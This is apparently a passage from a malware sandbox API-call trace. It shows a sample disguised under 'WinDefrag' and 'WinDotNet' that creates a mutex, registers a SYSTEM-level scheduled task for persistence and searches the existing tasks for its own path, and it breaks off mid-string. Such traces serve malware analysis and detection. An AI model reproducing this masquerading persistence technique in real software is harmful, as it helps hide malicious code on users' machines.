_Format="Global\\%08lX%04lX%lu", _ArgList=0x18e948 | out: _Buffer="Global\\E0B7509842600") returned 20 [0169.045] CreateMutexW (lpMutexAttributes=0x18eca0, bInitialOwner=1, lpName="Global\\E0B7509842600") returned 0xfc [0169.045] LocalFree (hMem=0x383ac0) returned 0x0 [0169.045] GetLastError () returned 0x0 [0169.045] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77b20000 [0169.045] GetProcAddress (hModule=0x77b20000, lpProcName="HeapAlloc") returned 0x77c933a0 [0169.045] GetProcAddress (hModule=0x77b20000, lpProcName="GetProcessHeap") returned 0x77b43050 [0169.045] GetProcAddress (hModule=0x77b20000, lpProcName="HeapFree") returned 0x77b43070 [0169.046] GetProcAddress (hModule=0x77b20000, lpProcName="HeapReAlloc") returned 0x77c73f20 [0169.046] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x39ee70, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe")) returned 0x37 [0169.046] PathRenameExtensionW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe", pszExt=".tmp" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.tmp") returned 1 [0169.046] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.tmp")) returned 0xffffffff [0169.046] GetVersionExW (in: lpVersionInformation=0x18ec70*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x400258ec, dwBuildNumber=0x1, dwPlatformId=0x383ac0, szCSDVersion="") | out: lpVersionInformation=0x18ec70*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0169.046] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x39ee70, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe")) returned 0x37 [0169.046] GetVersion () returned 0x1db10106 [0169.046] CoCreateInstance (in: rclsid=0x14002e0e8*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x14002ded8*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x140033368 | out: ppv=0x140033368*=0x3259c0) returned 0x0 [0169.169] TaskScheduler:ITaskService:Connect (This=0x3259c0, serverName=0x18e9d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x18ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x18e990*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x18e950*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0169.173] TaskScheduler:ITaskService:GetFolder (in: This=0x3259c0, Path=0x0, ppFolder=0x18edb0 | out: ppFolder=0x18edb0*=0x3267a0) returned 0x0 [0169.175] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18e120, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18e138 | out: pSid=0x18e138*=0x3966c0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0169.175] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x3966c0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x18e200, cchName=0x18e858, ReferencedDomainName=0x18e400, cchReferencedDomainName=0x18e848, peUse=0x18e130 | out: Name="SYSTEM", cchName=0x18e858, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x18e848, peUse=0x18e130) returned 1 [0169.176] _time64 (in: _Time=0x18e128 | out: _Time=0x18e128) returned 0x5c09a28c [0169.176] _localtime64 (_Time=0x18e128) returned 0x19df90 [0169.185] wcsftime (in: _Buf=0x18e160, _SizeInWords=0x1a, _Format="%Y-%m-%dT%H:%M:%S", _Tm=0x19df90 | out: _Buf="2018-12-06T22:29:28") returned 0x13 [0169.200] ITaskFolder:RegisterTask (in: This=0x3267a0, Path="WinDotNet", XmlText="\n\n\n1.0.1\nWinDotNet\n\n\n\n\ntrue\n\n\n\nPT10M\nP415DT15H58M\nfalse\n\n2018-12-06T22:29:28\ntrue\n\n\n\n\nHighestAvailable\nNT AUTHORITY\\SYSTEM\nInteractiveToken\n\n\n\nIgnoreNew\nfalse\nfalse\nfalse\ntrue\nfalse\n\ntrue\nfalse\n\ntrue\ntrue\ntrue\nfalse\nfalse\nPT0S\n7\n\n\n\nC:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\n\n\n\n", flags=6, UserId=0x18e970*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="SYSTEM", varVal2=0x18e948), password=0x18ea10*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x360270, varVal2=0x4cfca4e50f87369f), LogonType=5, sddl=0x18ea50*(varType=0x0, wReserved1=0x8b6e, wReserved2=0x8bac, wReserved3=0x70dd, varVal1=0x7feffbc6cd0, varVal2=0x8), ppTask=0x18e890 | out: ppTask=0x18e890*=0x326850) returned 0x0 [0169.280] GetCurrentProcess () returned 0xffffffffffffffff [0169.280] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x18e858 | out: TokenHandle=0x18e858*=0x124) returned 1 [0169.280] GetTokenInformation (in: TokenHandle=0x124, TokenInformationClass=0x1, TokenInformation=0x18e7c0, TokenInformationLength=0x54, ReturnLength=0x18e840 | out: TokenInformation=0x18e7c0, ReturnLength=0x18e840) returned 1 [0169.280] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18e848, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18e850 | out: pSid=0x18e850*=0x3966c0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0169.280] EqualSid (pSid1=0x18e7d0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68)), pSid2=0x3966c0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0 [0169.280] CloseHandle (hObject=0x124) returned 1 [0169.280] ITaskFolder:GetTasks (in: This=0x3267a0, flags=1, ppTasks=0x18e6f0 | out: ppTasks=0x18e6f0*=0x3267f0) returned 0x0 [0169.288] IRegisteredTaskCollection:get_Count (in: This=0x3267f0, pCount=0x18e840 | out: pCount=0x18e840*=5) returned 0x0 [0169.288] IRegisteredTaskCollection:get_Item (in: This=0x3267f0, index=0x18e720*(varType=0x3, wReserved1=0x39, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e6e8 | out: ppRegisteredTask=0x18e6e8*=0x326990) returned 0x0 [0169.289] IRegisteredTask:get_Name (in: This=0x326990, pName=0x18e6e0 | out: pName=0x18e6e0*="Adobe Flash Player Updater") returned 0x0 [0169.289] IRegisteredTask:get_Xml (in: This=0x326990, pXml=0x18e6d0 | out: pXml=0x18e6d0*="\r\n\r\n \r\n Adobe Systems Incorporated\r\n This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.\r\n \r\n \r\n \r\n true\r\n \r\n PT3600S\r\n PT86400S\r\n false\r\n \r\n 2000-01-01T00:59:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n PT259200S\r\n false\r\n false\r\n false\r\n true\r\n false\r\n 9\r\n \r\n PT600S\r\n PT3600S\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n System\r\n InteractiveTokenOrPassword\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashPlayerUpdateService.exe\r\n \r\n \r\n") returned 0x0 [0169.300] StrStrIW (lpFirst="\r\n\r\n \r\n Adobe Systems Incorporated\r\n This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.\r\n \r\n \r\n \r\n true\r\n \r\n PT3600S\r\n PT86400S\r\n false\r\n \r\n 2000-01-01T00:59:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n PT259200S\r\n false\r\n false\r\n false\r\n true\r\n false\r\n 9\r\n \r\n PT600S\r\n PT3600S\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n System\r\n InteractiveTokenOrPassword\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashPlayerUpdateService.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.302] IUnknown:Release (This=0x326990) returned 0x0 [0169.302] IRegisteredTaskCollection:get_Item (in: This=0x3267f0, index=0x18e720*(varType=0x3, wReserved1=0x39, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e6e8 | out: ppRegisteredTask=0x18e6e8*=0x326990) returned 0x0 [0169.302] IRegisteredTask:get_Name (in: This=0x326990, pName=0x18e6e0 | out: pName=0x18e6e0*="GoogleUpdateTaskMachineCore") returned 0x0 [0169.302] IRegisteredTask:get_Xml (in: This=0x326990, pXml=0x18e6d0 | out: pXml=0x18e6d0*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0 [0169.305] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\